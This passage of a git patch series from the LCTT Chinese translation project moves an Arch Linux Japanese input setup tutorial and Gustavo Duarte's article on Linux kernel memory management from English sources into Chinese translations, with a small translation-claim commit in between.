-![](https://www.ostechnix.com/wp-content/uploads/2017/11/Setup-Japanese-Language-Environment-In-Arch-Linux-720x340.jpg)
-
-In this tutorial, we will be discussing how to setup Japanese language environment in Arch Linux. In other Unix-like operating systems, it is not a big deal to setup Japanese layout. You can easily choose the Japanese keyboard layout from Settings. However, it is bit difficult under Arch Linux and there is no proper documentation in ArchWiki. If you're using Arch Linux and/or its derivatives like Antergos, Manajaro Linux, follow this guide to use Japanese language in your Arch Linux and its derivatives systems.
-
-### Setup Japanese Language Environment In Arch Linux
-
-First, install the necessary Japanese fonts for viewing Japanese ascii arts properly:
-```
-sudo pacman -S adobe-source-han-sans-jp-fonts otf-ipafont
-```
-```
-pacaur -S ttf-monapo
-```
-
-If you don't have Pacaur installed already, refer [**this link**][1].
-
-Make sure you have commented out (add # to comment out) the following line in **/etc/locale.gen** file.
-```
-#ja_JP.UTF-8
-```
-
-Then, install **iBus** and **ibus-anthy**. For those wondering, iBus is Input method (IM) framework for Unix-like systems and ibus-anthy is the Japanese input method for iBus.
-```
-sudo pacman -S ibus ibus-anthy
-```
-
-Add the following lines in **~/.xprofile** (If it doesn 't exist, create one):
-```
-# Settings for Japanese input
-export GTK_IM_MODULE='ibus'
-export QT_IM_MODULE='ibus'
-export XMODIFIERS=@im='ibus'
-
-#Toolbar for anthy
-ibus-daemon -drx
-```
-
-The ~/.xprofile file allows us to execute commands at the beginning of the X user session before the window manager is started.
-
-Save and close the file. Restart your Arch Linux system to take effect the changes.
-
-After logging in to your system, right click on the iBus icon in the task bar and choose **Preferences**. If it is not there, run the following command from Terminal to start IBus and open the preferences window.
-```
-ibus-setup
-```
-
-Choose Yes to start iBus. You will see a screen something like below. Click Ok to close it.
-
-[![][2]][3]
-
-Now, you will see the iBus preferences window. Go to **Input Method** tab and click "Add" button.
-
-[![][2]][4]
-
-Choose "Japanese" from the list:
-
-[![][2]][5]
-
-And then, choose "Anthy" and click Add.
-
-[![][2]][6]
-
-That's it. You will now see "Japanese - Anthy" in your Input Method section.
-
-[![][2]][7]
-
-Then change the options for Japanese input as per your requirement in the Preferences section (Click Japanese - Anthy -> Preferences).
-
-[![][2]][8]
-
-You can also edit the default shortcuts in the key bindings section. Once you made all changes, click Apply and OK. That's it. Choose the Japanese language from iBus icon in the task bar or press **SUPER KEY+SPACE BAR** to switch between Japanese and English languages (or any other default language in your system). You can change the keyboard shortcuts from IBus Preferences window.
-
-You know now how to use Japanese language in Arch Linux and derivatives. If you find our guides useful, please share them on your social, professional networks and support OSTechNix.
-
-
-
---------------------------------------------------------------------------------
-
-via: https://www.ostechnix.com/setup-japanese-language-environment-arch-linux/
-
-作者:[][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.ostechnix.com
-[1]:https://www.ostechnix.com/install-pacaur-arch-linux/
-[2]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
-[3]:http://www.ostechnix.com/wp-content/uploads/2017/11/ibus.png ()
-[4]:http://www.ostechnix.com/wp-content/uploads/2017/11/iBus-preferences.png ()
-[5]:http://www.ostechnix.com/wp-content/uploads/2017/11/Choose-Japanese.png ()
-[6]:http://www.ostechnix.com/wp-content/uploads/2017/11/Japanese-Anthy.png ()
-[7]:http://www.ostechnix.com/wp-content/uploads/2017/11/iBus-preferences-1.png ()
-[8]:http://www.ostechnix.com/wp-content/uploads/2017/11/ibus-anthy.png ()
diff --git a/translated/tech/20171108 How To Setup Japanese Language Environment In Arch Linux.md b/translated/tech/20171108 How To Setup Japanese Language Environment In Arch Linux.md
new file mode 100644
index 0000000000..e924dcbf28
--- /dev/null
+++ b/translated/tech/20171108 How To Setup Japanese Language Environment In Arch Linux.md
@@ -0,0 +1,99 @@
+如何在 Arch Linux 中设置日语环境
+======
+
+![](https://www.ostechnix.com/wp-content/uploads/2017/11/Setup-Japanese-Language-Environment-In-Arch-Linux-720x340.jpg)
+
+在本教程中,我们将讨论如何在 Arch Linux 中设置日语环境。在其他类 Unix 操作系统中,设置日文布局并不是什么大不了的事情。你可以从设置中轻松选择日文键盘布局。然而,在 Arch Linux 下有点困难,ArchWiki 中没有合适的文档。如果你正在使用 Arch Linux 和/或其衍生产品如 Antergos,Manajaro Linux,请遵循本指南在 Arch Linux 及其衍生系统中使用日语。
+
+### 在Arch Linux中设置日语环境
+
+首先,安装必要的日语字体,以正确查看日语 ASCII 格式:
+```
+sudo pacman -S adobe-source-han-sans-jp-fonts otf-ipafont
+```
+```
+pacaur -S ttf-monapo
+```
+
+如果你尚未安装 pacaur,请参阅[**此链接**][1]。
+
+确保你在 **/etc/locale.gen** 中注释掉了(添加 # 注释)下面的行。
+```
+#ja_JP.UTF-8
+```
+
+然后,安装 **iBus** 和 **ibus-anthy**。对于那些想知道原因的,iBus 是类 Unix 系统的输入法(IM)框架,而 ibus-anthy 是 iBus 的日语输入法。
+```
+sudo pacman -S ibus ibus-anthy
+```
+
+在 **~/.xprofile** 中添加以下行(如果不存在,创建一个):
+```
+# Settings for Japanese input
+export GTK_IM_MODULE='ibus'
+export QT_IM_MODULE='ibus'
+export XMODIFIERS=@im='ibus'
+
+#Toolbar for anthy
+ibus-daemon -drx
+```
+
+~/.xprofile 允许我们在窗口管理器启动之前在 X 用户会话开始时执行命令。
+
+
+保存并关闭文件。重启 Arch Linux 系统以使更改生效。
+
+登录到系统后,右键单击任务栏中的 iBus 图标,然后选择 **Preferences**。如果不存在,请从终端运行以下命令来启动 iBus 并打开偏好设置窗口。
+```
+ibus-setup
+```
+
+选择 Yes 来启动 iBus。你会看到一个像下面的页面。点击 Ok 关闭它。
+
+[![][2]][3]
+
+现在,你将看到 iBus 偏好设置窗口。进入 **Input Method** 选项卡,然后单击 “Add” 按钮。
+
+[![][2]][4]
+
+在列表中选择 “Japanese”:
+
+[![][2]][5]
+
+然后,选择 “Anthy” 并点击添加。
+
+[![][2]][6]
+
+就是这样了。你现在将在输入法栏看到 “Japanese - Anthy”。
+
+[![][2]][7]
+
+根据你的需求在偏好设置中更改日语输入法的选项(点击 Japanese - Anthy -> Preferences)。
+
+[![][2]][8]
+
+你还可以在键盘绑定中编辑默认的快捷键。完成所有更改后,单击应用并确定。就是这样。从任务栏中的 iBus 图标中选择日语,或者按下**Command/Window 键+空格键**来在日语和英语(或者系统中的其他默认语言)之间切换。你可以从 iBus 首选项窗口更改键盘快捷键。
+
+你现在知道如何在 Arch Linux 及其衍生版中使用日语了。如果你发现我们的指南很有用,那么请您在社交、专业网络上分享,并支持 OSTechNix。
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/setup-japanese-language-environment-arch-linux/
+
+作者:[][a]
+译者:[geekpi](https://github.com/geekpi)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com
+[1]:https://www.ostechnix.com/install-pacaur-arch-linux/
+[2]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[3]:http://www.ostechnix.com/wp-content/uploads/2017/11/ibus.png ()
+[4]:http://www.ostechnix.com/wp-content/uploads/2017/11/iBus-preferences.png ()
+[5]:http://www.ostechnix.com/wp-content/uploads/2017/11/Choose-Japanese.png ()
+[6]:http://www.ostechnix.com/wp-content/uploads/2017/11/Japanese-Anthy.png ()
+[7]:http://www.ostechnix.com/wp-content/uploads/2017/11/iBus-preferences-1.png ()
+[8]:http://www.ostechnix.com/wp-content/uploads/2017/11/ibus-anthy.png ()
From 7dab8791843c55e91ef4ab2cb2549aab3105b60c Mon Sep 17 00:00:00 2001
From: geekpi
Date: Fri, 12 Jan 2018 09:00:06 +0800
Subject: [PATCH 263/371] translating
---
.../20170524 Working with Vi-Vim Editor - Advanced concepts.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20170524 Working with Vi-Vim Editor - Advanced concepts.md b/sources/tech/20170524 Working with Vi-Vim Editor - Advanced concepts.md
index 052069d66a..45f8684b58 100644
--- a/sources/tech/20170524 Working with Vi-Vim Editor - Advanced concepts.md
+++ b/sources/tech/20170524 Working with Vi-Vim Editor - Advanced concepts.md
@@ -1,3 +1,5 @@
+translating---geekpi
+
Working with Vi/Vim Editor : Advanced concepts
======
Earlier we have discussed some basics about VI/VIM editor but VI & VIM are both very powerful editors and there are many other functionalities that can be used with these editors. In this tutorial, we are going to learn some advanced uses of VI/VIM editor.
From 05ee53722112e2d1102643104dbcd50972be9a2d Mon Sep 17 00:00:00 2001
From: qhwdw
Date: Fri, 12 Jan 2018 12:30:40 +0800
Subject: [PATCH 264/371] Translated by qhwdw
---
...0203 How the Kernel Manages Your Memory.md | 104 ------------------
...0203 How the Kernel Manages Your Memory.md | 103 +++++++++++++++++
2 files changed, 103 insertions(+), 104 deletions(-)
delete mode 100644 sources/tech/20090203 How the Kernel Manages Your Memory.md
create mode 100644 translated/tech/20090203 How the Kernel Manages Your Memory.md
diff --git a/sources/tech/20090203 How the Kernel Manages Your Memory.md b/sources/tech/20090203 How the Kernel Manages Your Memory.md
deleted file mode 100644
index 2a95c74ecb..0000000000
--- a/sources/tech/20090203 How the Kernel Manages Your Memory.md
+++ /dev/null
@@ -1,104 +0,0 @@
-Translating by qhwdw
-How the Kernel Manages Your Memory
-============================================================
-
-
-After examining the [virtual address layout][1] of a process, we turn to the kernel and its mechanisms for managing user memory. Here is gonzo again:
-
-![Linux kernel mm_struct](http://static.duartes.org/img/blogPosts/mm_struct.png)
-
-Linux processes are implemented in the kernel as instances of [task_struct][2], the process descriptor. The [mm][3] field in task_struct points to the memory descriptor, [mm_struct][4], which is an executive summary of a program’s memory. It stores the start and end of memory segments as shown above, the [number][5] of physical memory pages used by the process (rss stands for Resident Set Size), the [amount][6] of virtual address space used, and other tidbits. Within the memory descriptor we also find the two work horses for managing program memory: the set of virtual memory areas and the page tables. Gonzo’s memory areas are shown below:
-
-![Kernel memory descriptor and memory areas](http://static.duartes.org/img/blogPosts/memoryDescriptorAndMemoryAreas.png)
-
-Each virtual memory area (VMA) is a contiguous range of virtual addresses; these areas never overlap. An instance of [vm_area_struct][7] fully describes a memory area, including its start and end addresses, [flags][8] to determine access rights and behaviors, and the [vm_file][9] field to specify which file is being mapped by the area, if any. A VMA that does not map a file is anonymous. Each memory segment above ( _e.g._ , heap, stack) corresponds to a single VMA, with the exception of the memory mapping segment. This is not a requirement, though it is usual in x86 machines. VMAs do not care which segment they are in.
-
-A program’s VMAs are stored in its memory descriptor both as a linked list in the [mmap][10] field, ordered by starting virtual address, and as a [red-black tree][11] rooted at the [mm_rb][12] field. The red-black tree allows the kernel to search quickly for the memory area covering a given virtual address. When you read file `/proc/pid_of_process/maps`, the kernel is simply going through the linked list of VMAs for the process and [printing each one][13].
-
-In Windows, the [EPROCESS][14] block is roughly a mix of task_struct and mm_struct. The Windows analog to a VMA is the Virtual Address Descriptor, or [VAD][15]; they are stored in an [AVL tree][16]. You know what the funniest thing about Windows and Linux is? It’s the little differences.
-
-The 4GB virtual address space is divided into pages. x86 processors in 32-bit mode support page sizes of 4KB, 2MB, and 4MB. Both Linux and Windows map the user portion of the virtual address space using 4KB pages. Bytes 0-4095 fall in page 0, bytes 4096-8191 fall in page 1, and so on. The size of a VMA _must be a multiple of page size_ . Here’s 3GB of user space in 4KB pages:
-
-![4KB Pages Virtual User Space](http://static.duartes.org/img/blogPosts/pagedVirtualSpace.png)
-
-The processor consults page tables to translate a virtual address into a physical memory address. Each process has its own set of page tables; whenever a process switch occurs, page tables for user space are switched as well. Linux stores a pointer to a process’ page tables in the [pgd][17] field of the memory descriptor. To each virtual page there corresponds one page table entry (PTE) in the page tables, which in regular x86 paging is a simple 4-byte record shown below:
-
-![x86 Page Table Entry (PTE) for 4KB page](http://static.duartes.org/img/blogPosts/x86PageTableEntry4KB.png)
-
-Linux has functions to [read][18] and [set][19] each flag in a PTE. Bit P tells the processor whether the virtual page is present in physical memory. If clear (equal to 0), accessing the page triggers a page fault. Keep in mind that when this bit is zero, the kernel can do whatever it pleases with the remaining fields. The R/W flag stands for read/write; if clear, the page is read-only. Flag U/S stands for user/supervisor; if clear, then the page can only be accessed by the kernel. These flags are used to implement the read-only memory and protected kernel space we saw before.
-
-Bits D and A are for dirty and accessed. A dirty page has had a write, while an accessed page has had a write or read. Both flags are sticky: the processor only sets them, they must be cleared by the kernel. Finally, the PTE stores the starting physical address that corresponds to this page, aligned to 4KB. This naive-looking field is the source of some pain, for it limits addressable physical memory to [4 GB][20]. The other PTE fields are for another day, as is Physical Address Extension.
-
-A virtual page is the unit of memory protection because all of its bytes share the U/S and R/W flags. However, the same physical memory could be mapped by different pages, possibly with different protection flags. Notice that execute permissions are nowhere to be seen in the PTE. This is why classic x86 paging allows code on the stack to be executed, making it easier to exploit stack buffer overflows (it’s still possible to exploit non-executable stacks using [return-to-libc][21] and other techniques). This lack of a PTE no-execute flag illustrates a broader fact: permission flags in a VMA may or may not translate cleanly into hardware protection. The kernel does what it can, but ultimately the architecture limits what is possible.
-
-Virtual memory doesn’t store anything, it simply _maps_ a program’s address space onto the underlying physical memory, which is accessed by the processor as a large block called the physical address space. While memory operations on the bus are [somewhat involved][22], we can ignore that here and assume that physical addresses range from zero to the top of available memory in one-byte increments. This physical address space is broken down by the kernel into page frames. The processor doesn’t know or care about frames, yet they are crucial to the kernel because the page frame is the unit of physical memory management. Both Linux and Windows use 4KB page frames in 32-bit mode; here is an example of a machine with 2GB of RAM:
-
-![Physical Address Space](http://static.duartes.org/img/blogPosts/physicalAddressSpace.png)
-
-In Linux each page frame is tracked by a [descriptor][23] and [several flags][24]. Together these descriptors track the entire physical memory in the computer; the precise state of each page frame is always known. Physical memory is managed with the [buddy memory allocation][25]technique, hence a page frame is free if it’s available for allocation via the buddy system. An allocated page frame might be anonymous, holding program data, or it might be in the page cache, holding data stored in a file or block device. There are other exotic page frame uses, but leave them alone for now. Windows has an analogous Page Frame Number (PFN) database to track physical memory.
-
-Let’s put together virtual memory areas, page table entries and page frames to understand how this all works. Below is an example of a user heap:
-
-![Physical Address Space](http://static.duartes.org/img/blogPosts/heapMapped.png)
-
-Blue rectangles represent pages in the VMA range, while arrows represent page table entries mapping pages onto page frames. Some virtual pages lack arrows; this means their corresponding PTEs have the Present flag clear. This could be because the pages have never been touched or because their contents have been swapped out. In either case access to these pages will lead to page faults, even though they are within the VMA. It may seem strange for the VMA and the page tables to disagree, yet this often happens.
-
-A VMA is like a contract between your program and the kernel. You ask for something to be done (memory allocated, a file mapped, etc.), the kernel says “sure”, and it creates or updates the appropriate VMA. But _it does not_ actually honor the request right away, it waits until a page fault happens to do real work. The kernel is a lazy, deceitful sack of scum; this is the fundamental principle of virtual memory. It applies in most situations, some familiar and some surprising, but the rule is that VMAs record what has been _agreed upon_ , while PTEs reflect what has _actually been done_ by the lazy kernel. These two data structures together manage a program’s memory; both play a role in resolving page faults, freeing memory, swapping memory out, and so on. Let’s take the simple case of memory allocation:
-
-![Example of demand paging and memory allocation](http://static.duartes.org/img/blogPosts/heapAllocation.png)
-
-When the program asks for more memory via the [brk()][26] system call, the kernel simply [updates][27]the heap VMA and calls it good. No page frames are actually allocated at this point and the new pages are not present in physical memory. Once the program tries to access the pages, the processor page faults and [do_page_fault()][28] is called. It [searches][29] for the VMA covering the faulted virtual address using [find_vma()][30]. If found, the permissions on the VMA are also checked against the attempted access (read or write). If there’s no suitable VMA, no contract covers the attempted memory access and the process is punished by Segmentation Fault.
-
-When a VMA is [found][31] the kernel must [handle][32] the fault by looking at the PTE contents and the type of VMA. In our case, the PTE shows the page is [not present][33]. In fact, our PTE is completely blank (all zeros), which in Linux means the virtual page has never been mapped. Since this is an anonymous VMA, we have a purely RAM affair that must be handled by [do_anonymous_page()][34], which allocates a page frame and makes a PTE to map the faulted virtual page onto the freshly allocated frame.
-
-Things could have been different. The PTE for a swapped out page, for example, has 0 in the Present flag but is not blank. Instead, it stores the swap location holding the page contents, which must be read from disk and loaded into a page frame by [do_swap_page()][35] in what is called a [major fault][36].
-
-This concludes the first half of our tour through the kernel’s user memory management. In the next post, we’ll throw files into the mix to build a complete picture of memory fundamentals, including consequences for performance.
-
---------------------------------------------------------------------------------
-
-via: http://duartes.org/gustavo/blog/post/how-the-kernel-manages-your-memory/
-
-作者:[Gustavo Duarte][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:http://duartes.org/gustavo/blog/about/
-[1]:http://duartes.org/gustavo/blog/post/anatomy-of-a-program-in-memory
-[2]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/sched.h#L1075
-[3]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/sched.h#L1129
-[4]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L173
-[5]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L197
-[6]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L206
-[7]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L99
-[8]:http://lxr.linux.no/linux+v2.6.28/include/linux/mm.h#L76
-[9]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L150
-[10]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L174
-[11]:http://en.wikipedia.org/wiki/Red_black_tree
-[12]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L175
-[13]:http://lxr.linux.no/linux+v2.6.28.1/fs/proc/task_mmu.c#L201
-[14]:http://www.nirsoft.net/kernel_struct/vista/EPROCESS.html
-[15]:http://www.nirsoft.net/kernel_struct/vista/MMVAD.html
-[16]:http://en.wikipedia.org/wiki/AVL_tree
-[17]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L185
-[18]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/include/asm/pgtable.h#L173
-[19]:http://lxr.linux.no/linux+v2.6.28.1/arch/x86/include/asm/pgtable.h#L230
-[20]:http://www.google.com/search?hl=en&q=2^20+*+2^12+bytes+in+GB
-[21]:http://en.wikipedia.org/wiki/Return-to-libc_attack
-[22]:http://duartes.org/gustavo/blog/post/getting-physical-with-memory
-[23]:http://lxr.linux.no/linux+v2.6.28/include/linux/mm_types.h#L32
-[24]:http://lxr.linux.no/linux+v2.6.28/include/linux/page-flags.h#L14
-[25]:http://en.wikipedia.org/wiki/Buddy_memory_allocation
-[26]:http://www.kernel.org/doc/man-pages/online/pages/man2/brk.2.html
-[27]:http://lxr.linux.no/linux+v2.6.28.1/mm/mmap.c#L2050
-[28]:http://lxr.linux.no/linux+v2.6.28/arch/x86/mm/fault.c#L583
-[29]:http://lxr.linux.no/linux+v2.6.28/arch/x86/mm/fault.c#L692
-[30]:http://lxr.linux.no/linux+v2.6.28/mm/mmap.c#L1466
-[31]:http://lxr.linux.no/linux+v2.6.28/arch/x86/mm/fault.c#L711
-[32]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2653
-[33]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2674
-[34]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2681
-[35]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2280
-[36]:http://lxr.linux.no/linux+v2.6.28/mm/memory.c#L2316
diff --git a/translated/tech/20090203 How the Kernel Manages Your Memory.md b/translated/tech/20090203 How the Kernel Manages Your Memory.md
new file mode 100644
index 0000000000..ca66bfdf3e
--- /dev/null
+++ b/translated/tech/20090203 How the Kernel Manages Your Memory.md
@@ -0,0 +1,103 @@
+内核如何管理内存
+============================================================
+
+
+在学习了进程的 [虚拟地址布局][1] 之后,我们回到内核,来学习它管理用户内存的机制。这里再次使用 Gonzo:
+
+![Linux kernel mm_struct](http://static.duartes.org/img/blogPosts/mm_struct.png)
+
+Linux 进程在内核中是作为进程描述符 [task_struct][2] (译者注:它是在 Linux 中描述进程完整信息的一种数据结构)的实例来实现的。在 task_struct 中的 [mm][3] 域指向到内存描述符,[mm_struct][4] 是一个程序在内存中的执行摘要。它保存了起始和结束内存段,如下图所示,进程使用的物理内存页面的 [数量][5](RSS 译者注:(Resident Set Size)常驻内存大小 )、虚拟地址空间使用的 [总数量][6]、以及其它片断。 在内存描述中,我们可以获悉它有两种管理内存的方式:虚拟内存区域集和页面表。Gonzo 的内存区域如下所示:
+
+![Kernel memory descriptor and memory areas](http://static.duartes.org/img/blogPosts/memoryDescriptorAndMemoryAreas.png)
+
+每个虚拟内存区域(VMA)是一个连续的虚拟地址范围;这些区域绝对不会重叠。一个 [vm_area_struct][7] 的实例完整描述了一个内存区域,包括它的起始和结束地址,[flags][8] 决定了访问权限和行为,并且 [vm_file][9] 域指定了映射到这个区域的文件(如果有的话)。除了内存映射段的例外情况之外,一个 VMA 是不能匿名映射文件的,上面的每个内存段(比如,堆、栈)都对应一个单个的 VMA。虽然它通常都使用在 x86 的机器上,但它并不是必需的。VMAs 也不关心它们在哪个段中。
+
+一个程序的 VMAs 在内存描述符中作为 [mmap][10] 域的一个链接列表保存的,以起始虚拟地址为序进行排列,并且在 [mm_rb][12] 域中作为一个 [红黑树][11] 的根。红黑树允许内核通过给定的虚拟地址去快速搜索内存区域。在你读取文件 `/proc/pid_of_process/maps`时,内核只是简单地读取每个进程的 VMAs 的链接列表并显示它们。
+
+在 Windows 中,[EPROCESS][14] 块大致类似于一个 task_struct 和 mm_struct 的结合。在 Windows 中模拟一个 VMA 的是虚拟地址描述符,或称为 [VAD][15];它保存在一个 [AVL 树][16] 中。你知道关于 Windows 和 Linux 之间最有趣的事情是什么吗?其实它们只有一点小差别。
+
+4GB 虚拟地址空间被分为两个页面。在 32 位模式中的 x86 处理器中支持 4KB、2MB、以及 4MB 大小的页面。Linux 和 Windows 都使用大小为 4KB 的页面去映射用户的一部分虚拟地址空间。字节 0-4095 在 page 0 中,字节 4096-8191 在 page 1 中,依次类推。VMA 的大小 _必须是页面大小的倍数_ 。下图是使用 4KB 大小页面的总数量为 3GB 的用户空间:
+
+![4KB Pages Virtual User Space](http://static.duartes.org/img/blogPosts/pagedVirtualSpace.png)
+
+处理器通过查看页面表去转换一个虚拟内存地址到一个真实的物理内存地址。每个进程都有它自己的一组页面表;每当发生进程切换时,用户空间的页面表也同时切换。Linux 在内存描述符的 [pgd][17] 域中保存了一个指向处理器页面表的指针。对于每个虚拟页面,页面表中都有一个相应的页面表条目(PTE),在常规的 x86 页面表中,它是一个简单的如下所示的大小为 4 字节的一条记录:
+
+![x86 Page Table Entry (PTE) for 4KB page](http://static.duartes.org/img/blogPosts/x86PageTableEntry4KB.png)
+
+Linux 通过函数去 [读取][18] 和 [设置][19] PTE 条目中的每个标志位。标志位 P 告诉处理器这个虚拟页面是否在物理内存中。如果被清除(设置为 0),访问这个页面将触发一个页面故障。请记住,当这个标志位为 0 时,内核可以在剩余的域上做任何想做的事。R/W 标志位是读/写标志;如果被清除,这个页面将变成只读的。U/S 标志位表示用户/超级用户;如果被清除,这个页面将仅被内核访问。这些标志都是用于实现我们在前面看到的只读内存和内核空间保护。
+
+标志位 D 和 A 用于标识页面是否是“脏的”或者是已被访问过。一个脏页面表示已经被写入,而一个被访问过的页面则表示有一个写入或者读取发生过。这两个标志位都是粘滞位:处理器只能设置它们,而清除则是由内核来完成的。最终,PTE 保存了这个页面相应的起始物理地址,它们按 4KB 进行整齐排列。这个看起来有点小的域是一些痛苦的根源,因为它限制了物理内存最大为 [4 GB][20]。其它的 PTE 域留到下次再讲,因为它是涉及了物理地址扩展的知识。
+
+由于在一个虚拟页面上的所有字节都共享一个 U/S 和 R/W 标志位,所以内存保护的最小单元是一个虚拟页面。但是,同一个物理内存可能被映射到不同的虚拟页面,这样就有可能会出现相同的物理内存出现不同的保护标志位的情况。请注意,在 PTE 中是看不到运行权限的。这就是为什么经典的 x86 页面上允许代码在栈上被执行的原因,这样会很容易导致挖掘栈缓冲溢出的漏洞(可能会通过使用 [return-to-libc][21] 和其它技术来开发非可执行栈)。由于 PTE 缺少禁止运行标志位说明了一个更广泛的事实:在 VMA 中的权限标志位有可能或者不可能完全转换为硬件保护。内核只能做它能做到的,但是,最终的架构限制了它能做的事情。
+
+虚拟内存不能保存任何东西,它只是简单地 _映射_ 一个程序的地址空间到底层的物理内存上。物理内存被当作一个被称为物理地址空间的巨大块来被处理器访问。虽然内存的操作[涉及到某些][22] 总线,我们在这里先忽略它,并假设物理地址范围从 0 到可用的最大值按字节递增。物理地址空间被内核进一步分解为页面帧。处理器并不会关心帧的具体情况,这一点对内核也是至关重要的,因为,页面帧是物理内存管理的最小单元。Linux 和 Windows 在 32 位模式下都使用 4KB 大小的页面帧;下图是一个有 2 GB 内存的机器的例子:
+
+![Physical Address Space](http://static.duartes.org/img/blogPosts/physicalAddressSpace.png)
+
+在 Linux 上每个页面帧是被一个 [描述符][23] 和 [几个标志][24] 来跟踪的。通过这些描述符和标志,实现了对机器上整个物理内存的跟踪;每个页面帧的具体状态是公开的。物理内存是通过使用 [Buddy 内存分配][25] (译者注:一种内存分配算法)技术来管理的,因此,如果可以通过 Buddy 系统分配内存,那么一个页面帧是未分配的(free)。一个被分配的页面帧可以是匿名的、持有程序数据的、或者它可能处于页面缓存中、持有数据保存在一个文件或者块设备中。还有其它的异形页面帧,但是这些异形页面帧现在已经不怎么使用了。Windows 有一个类似的页面帧号(Page Frame Number (PFN))数据库去跟踪物理内存。
+
+我们把虚拟内存区域(VMA)、页面表条目(PTE)、以及页面帧放在一起来理解它们是如何工作的。下面是一个用户堆的示例:
+
+![Physical Address Space](http://static.duartes.org/img/blogPosts/heapMapped.png)
+
+蓝色的矩形框表示在 VMA 范围内的页面,而箭头表示页面表条目映射页面到页面帧。一些缺少箭头的虚拟页面,表示它们对应的 PTEs 的当前标志位被清除(置为 0)。这可能是因为这个页面从来没有被使用过,或者是它的内容已经被交换出去了(swapped out)。在这两种情况下,即便这些页面在 VMA 中,访问它们也将导致产生一个页面故障。对于这种 VMA 和页面表的不一致的情况,看上去似乎很奇怪,但是这种情况却经常发生。
+
+一个 VMA 像一个在你的程序和内核之间的合约。你请求它做一些事情(分配内存、文件映射、等等),内核会回应“收到”,然后去创建或者更新相应的 VMA。 但是,它 _并不立刻_ 去“兑现”对你的承诺,而是它会等待到发生一个页面故障时才去 _真正_ 做这个工作。内核是个“懒惰的家伙”、“不诚实的人渣”;这就是虚拟内存的基本原理。它适用于大多数的、一些类似的和意外的情况,但是,它是规则是,VMAs 记录 _约定的_ 内容,而 PTEs 才反映这个“懒惰的内核” _真正做了什么_。通过这两种数据结构共同来管理程序的内存;它们共同来完成解决页面故障、释放内存、从内存中交换出数据、等等。下图是内存分配的一个简单案例:
+
+![Example of demand paging and memory allocation](http://static.duartes.org/img/blogPosts/heapAllocation.png)
+
+当程序通过 [brk()][26] 系统调用来请求一些内存时,内核只是简单地 [更新][27] 堆的 VMA 并给程序回复“已搞定”。而在这个时候并没有真正地分配页面帧并且新的页面也没有映射到物理内存上。一旦程序尝试去访问这个页面时,将发生页面故障,然后处理器调用 [do_page_fault()][28]。这个函数将使用 [find_vma()][30] 去 [搜索][29] 发生页面故障的 VMA。如果找到了,然后在 VMA 上进行权限检查以防范恶意访问(读取或者写入)。如果没有合适的 VMA,也没有尝试访问的内存的“合约”,将会给进程返回段故障。
+
+当找到了一个合适的 VMA,内核必须通过查找 PTE 的内容和 VMA 的类型去处理故障。在我们的案例中,PTE 显示这个页面是 [不存在的][33]。事实上,我们的 PTE 是全部空白的(全部都是 0),在 Linux 中这表示虚拟内存还没有被映射。由于这是匿名 VMA,我们有一个完全的 RAM 事务,它必须被 [do_anonymous_page()][34] 来处理,它分配页面帧,并且用一个 PTE 去映射故障虚拟页面到一个新分配的帧。
+
+有时候,事情可能会有所不同。例如,对于被交换出内存的页面的 PTE,在当前(Present)标志位上是 0,但它并不是空白的。而是在交换位置仍有页面内容,它必须从磁盘上读取并且通过 [do_swap_page()][35] 来加载到一个被称为 [major fault][36] 的页面帧上。
+
+这是我们通过探查内核的用户内存管理得出的前半部分的结论。在下一篇文章中,我们通过将文件加载到内存中,来构建一个完整的内存框架图,以及对性能的影响。
+
+--------------------------------------------------------------------------------
+
+via: http://duartes.org/gustavo/blog/post/how-the-kernel-manages-your-memory/
+
+作者:[Gustavo Duarte][a]
+译者:[qhwdw](https://github.com/qhwdw)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://duartes.org/gustavo/blog/about/
+[1]:http://duartes.org/gustavo/blog/post/anatomy-of-a-program-in-memory
+[2]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/sched.h#L1075
+[3]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/sched.h#L1129
+[4]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L173
+[5]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L197
+[6]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L206
+[7]:http://lxr.linux.no/linux+v2.6.28.1/include/linux/mm_types.h#L99
+[8]:http://lxr.linux.no/linux+v2.6.28/include/linux/mm.h#L76
